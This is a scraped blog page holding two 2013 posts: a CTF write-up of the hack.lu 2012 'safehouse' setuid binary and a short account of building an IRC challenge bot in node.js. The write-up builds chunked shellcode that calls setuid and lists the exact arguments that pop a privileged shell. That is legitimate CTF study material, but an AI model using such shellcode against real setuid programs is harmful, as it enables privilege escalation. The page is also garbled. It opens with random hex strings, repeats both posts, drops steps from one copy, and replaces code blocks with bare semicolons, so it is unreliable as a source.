This is a test for verification of empty HTML characters
367440962c84982e7c2209d3b15c447d
c2b43833ef3e16f4e1280d5b484f5245
666260b6b977a9d7e421196adda5d23a
be7c370b2d5d47ffb1fbc2af5bd19ea6
3d3bac6318f5 113307b8f6f913f334c9
465c55b91b77 3bfe95d62878af923569
fe701ab75ea8 ef226e4557459c205bb1
98ba020ccc76𐃁f7ac5e3993867ec23cb1
Wednesday, November 27, 2013
Saturday, November 2, 2013
Hacklu 2012: safehouse (binary 150) writeup
Yes, i know we are in 2013, but I still want to do a quick writeup of the binary safehouse from hacklu 2012, as I found this to be one of the best challenges I ever did in my life, really didactic!
So first of all, we have to ssh a web page, here is what we got:
ok, a nice setuid executable and its flag. As you can see, our user is called ctf, the target one (the one we want to impersonate) is called safe house.
So, let's start!
file command gives us "setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x5446b9058fdd04404a8b84827d5873028204ee90, not stripped"
Ok fine, so a 64bit executable, setuid (as we already know), not stripped lucky us!
run the program, nothing happen, exit 0.
Run the program with an argument display the following string:
Mmm.. me lika string! let's open it with IDA and look for the string!
A quick look on the binary let us find the function in charge of displaying our string:
Ok, so basically our program is checking for the number of args (not displayed, but it's just "if argc ==0 exit"), then drop the privileges and set our function as a handler for signals (in particular SIGSEGV). Then it allocates a page, and declare it as WRX.
mov al, 0x17 -> b0 17
mov bh, 0x3 -> b7 03 //highest part of 1006
mov bl, 0xee -> b3 ee //lowest part of 1006
int 0x80 -> 80 cd
Wow! we just need to split the setting of the bx register in two parts, and all our input is nicely divided in block 2 bytes-long!
Obviously we still need to fill up 1 byte without letting the process crash, what's better than a nice old 0x90!?
we just built 4 arguments then (remember LITTLE ENDIAN!):
'0x9017b0', '0x9003b7', '0x90eeb3', '0x9080cd'
Now it's just a matter of converting them to integer and we should be cool!
[9443248, 9438135, 9498291, 9470157]
Trying to call the program with these arguments give us
And a nice little shell for us!
that's it, I found this easy exploitation very didactic for building up a custom shellcode, a very nice piece of work!
There was also another version of this challenge a bit more complex, it will be for next time!
This is a link (from LeetMore writeup) for downloading the binary.
Enjoy!
So first of all, we have to ssh a web page, here is what we got:
 |
| beginning screen (from https://f00l.de/blog/) |
So, let's start!
file command gives us "setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x5446b9058fdd04404a8b84827d5873028204ee90, not stripped"
Ok fine, so a 64bit executable, setuid (as we already know), not stripped lucky us!
run the program, nothing happen, exit 0.
Run the program with an argument display the following string:
Mmm.. me lika string! let's open it with IDA and look for the string!
A quick look on the binary let us find the function in charge of displaying our string:
 |
| Function display the string "Zombie detected" |
Ok, as presumed, if this function is called it will display the string and then exit.
Looking a bit more in the binary we find where this function is called and what the binary is doing:
 |
| Series of actions for the main |
Then it writes on this page all strings we give as input as a double-word converted with strtoul function, appending 0xc3 as 4th byte and then call it! After calling all our "inputs", if no signal were received in the mean time it pops up a shell.
We begin to have an idea about what we have to do, we basically have to inject a shellcode so that the program will acquire the privileges of safehouse (without going in segfault), then the program itself is going to pop up a shell for us! the only limitation is given by that 0xC3 injection as the fourth byte on every double word, we need a clever way to write our shell code.
We know that setuid is a a system call, therefore we can call it by mean of a int 0x80h instruction.
Looking here we have a nice table of all system call, with relative parameters.
Gotcha! an int 0x80h with a 0x17 in eax will call sys_setuid, what we need! uid_t should be in ebx register, and we know safehouse is uid=1006 (in hex 0x3ee).
Now we need to divide our input in several pieces, all of them smaller than 4 bytes:
mov bh, 0x3 -> b7 03 //highest part of 1006
mov bl, 0xee -> b3 ee //lowest part of 1006
int 0x80 -> 80 cd
Wow! we just need to split the setting of the bx register in two parts, and all our input is nicely divided in block 2 bytes-long!
Obviously we still need to fill up 1 byte without letting the process crash, what's better than a nice old 0x90!?
we just built 4 arguments then (remember LITTLE ENDIAN!):
'0x9017b0', '0x9003b7', '0x90eeb3', '0x9080cd'
Now it's just a matter of converting them to integer and we should be cool!
[9443248, 9438135, 9498291, 9470157]
Trying to call the program with these arguments give us
And a nice little shell for us!
that's it, I found this easy exploitation very didactic for building up a custom shellcode, a very nice piece of work!
There was also another version of this challenge a bit more complex, it will be for next time!
This is a link (from LeetMore writeup) for downloading the binary.
Enjoy!
Friday, November 1, 2013
IRC BOT: node.js, why not!?
Some time ago I created an IRC channel, and what do you obviously want to do if you are the admin of an IRC channel?! create an awesome bot!
So let's create an IRC bot!
First thing was to decide the programming language:
I saw a lot of examples, from Ruby, Python, C, even Haskell! but all of them were a bit too complex, with tons of lines of code (except C, which was actually my first idea) that were unuseful for me.
So, what did I want?
I wanted something fast to write (I allocated no more than 2 hours for writing the whole code) and easy to configure, with the following actions:
- respond when consulted;
- give a challenge, wait for some time and activate a callback when the timeout expire.
Wait a minute, something silent, event-driven, scalable, non-blocking (should give different challenges to different channel at the same time).. that's the definition written on the home page of node.js!
Lucky me, somebody already implemented a module for implementing IRC in a really easy way, the code is basically a huge switch for doing different activities based on the message received by the client, with a few additions (a parser, a flood-avoidance), sounds good for me!
So, what is needed in order to configure it?
This:
;
Where config.json is
;
Not bad, uh?!
Then we just have to add some listeners, according to what we want the bot to listen to!
I wanted the bot to listen to the messages said on the channel, and if it sees a keyword ("@challenge"), activate a challenge!
the interface is the following:
;
really easy, so we just have to look at the message (which is a string, so we can/should parse it in a text via split), parse it and look if it contains our beloved string.
when the bot want to say something, all it has to do is just
;
Just that!
NOTE: currently I'm having an issue when a player is leaving a channel, the bot crashes with a ValueError. Quick and dirty solver, put the for content at line 503 in a try/catch statement and it won't happen again.
I just had to implement the logic for supporting challenges, with timeout etc, and that's it!
The implemented logic is really easy, the bot listen for a message starting with "@challenge", then look at the next word, and if there is a challenge with that name. If present, it then loads a challenge, write it to the channel and set a timeout.
If the bot receives a message starting with "@sol", look if there is an active challenge with that name for that channel, check the proposed solution with the actual one, and if the outcome is positive, it delete the timer and gives the prize.
I wanted an easy way to add new challenges, where I didn't have to touch the code, therefore I created a separate file (which has to be called with require), which gives to the bot the following object:
In this way we can create a challenge in a quick and easy way, all you need is just an idea of a challenge.
The only issue is that right now the challenge is intended as a question-answer, without middle-steps, but in that case is just a matter of doing a slight modification to the bot.js, by allowing an array of function as chall and solver, so that we can track the current step.
Link to the github repo.
Have fun!
So let's create an IRC bot!
First thing was to decide the programming language:
I saw a lot of examples, from Ruby, Python, C, even Haskell! but all of them were a bit too complex, with tons of lines of code (except C, which was actually my first idea) that were unuseful for me.
So, what did I want?
I wanted something fast to write (I allocated no more than 2 hours for writing the whole code) and easy to configure, with the following actions:
- respond when consulted;
- give a challenge, wait for some time and activate a callback when the timeout expire.
Wait a minute, something silent, event-driven, scalable, non-blocking (should give different challenges to different channel at the same time).. that's the definition written on the home page of node.js!
Lucky me, somebody already implemented a module for implementing IRC in a really easy way, the code is basically a huge switch for doing different activities based on the message received by the client, with a few additions (a parser, a flood-avoidance), sounds good for me!
So, what is needed in order to configure it?
This:
;
Where config.json is
;
Not bad, uh?!
Then we just have to add some listeners, according to what we want the bot to listen to!
I wanted the bot to listen to the messages said on the channel, and if it sees a keyword ("@challenge"), activate a challenge!
the interface is the following:
;
really easy, so we just have to look at the message (which is a string, so we can/should parse it in a text via split), parse it and look if it contains our beloved string.
when the bot want to say something, all it has to do is just
;
Just that!
NOTE: currently I'm having an issue when a player is leaving a channel, the bot crashes with a ValueError. Quick and dirty solver, put the for content at line 503 in a try/catch statement and it won't happen again.
I just had to implement the logic for supporting challenges, with timeout etc, and that's it!
The implemented logic is really easy, the bot listen for a message starting with "@challenge", then look at the next word, and if there is a challenge with that name. If present, it then loads a challenge, write it to the channel and set a timeout.
If the bot receives a message starting with "@sol", look if there is an active challenge with that name for that channel, check the proposed solution with the actual one, and if the outcome is positive, it delete the timer and gives the prize.
I wanted an easy way to add new challenges, where I didn't have to touch the code, therefore I created a separate file (which has to be called with require), which gives to the bot the following object:
In this way we can create a challenge in a quick and easy way, all you need is just an idea of a challenge.
The only issue is that right now the challenge is intended as a question-answer, without middle-steps, but in that case is just a matter of doing a slight modification to the bot.js, by allowing an array of function as chall and solver, so that we can track the current step.
Link to the github repo.
Have fun!
Subscribe to:
Posts (Atom)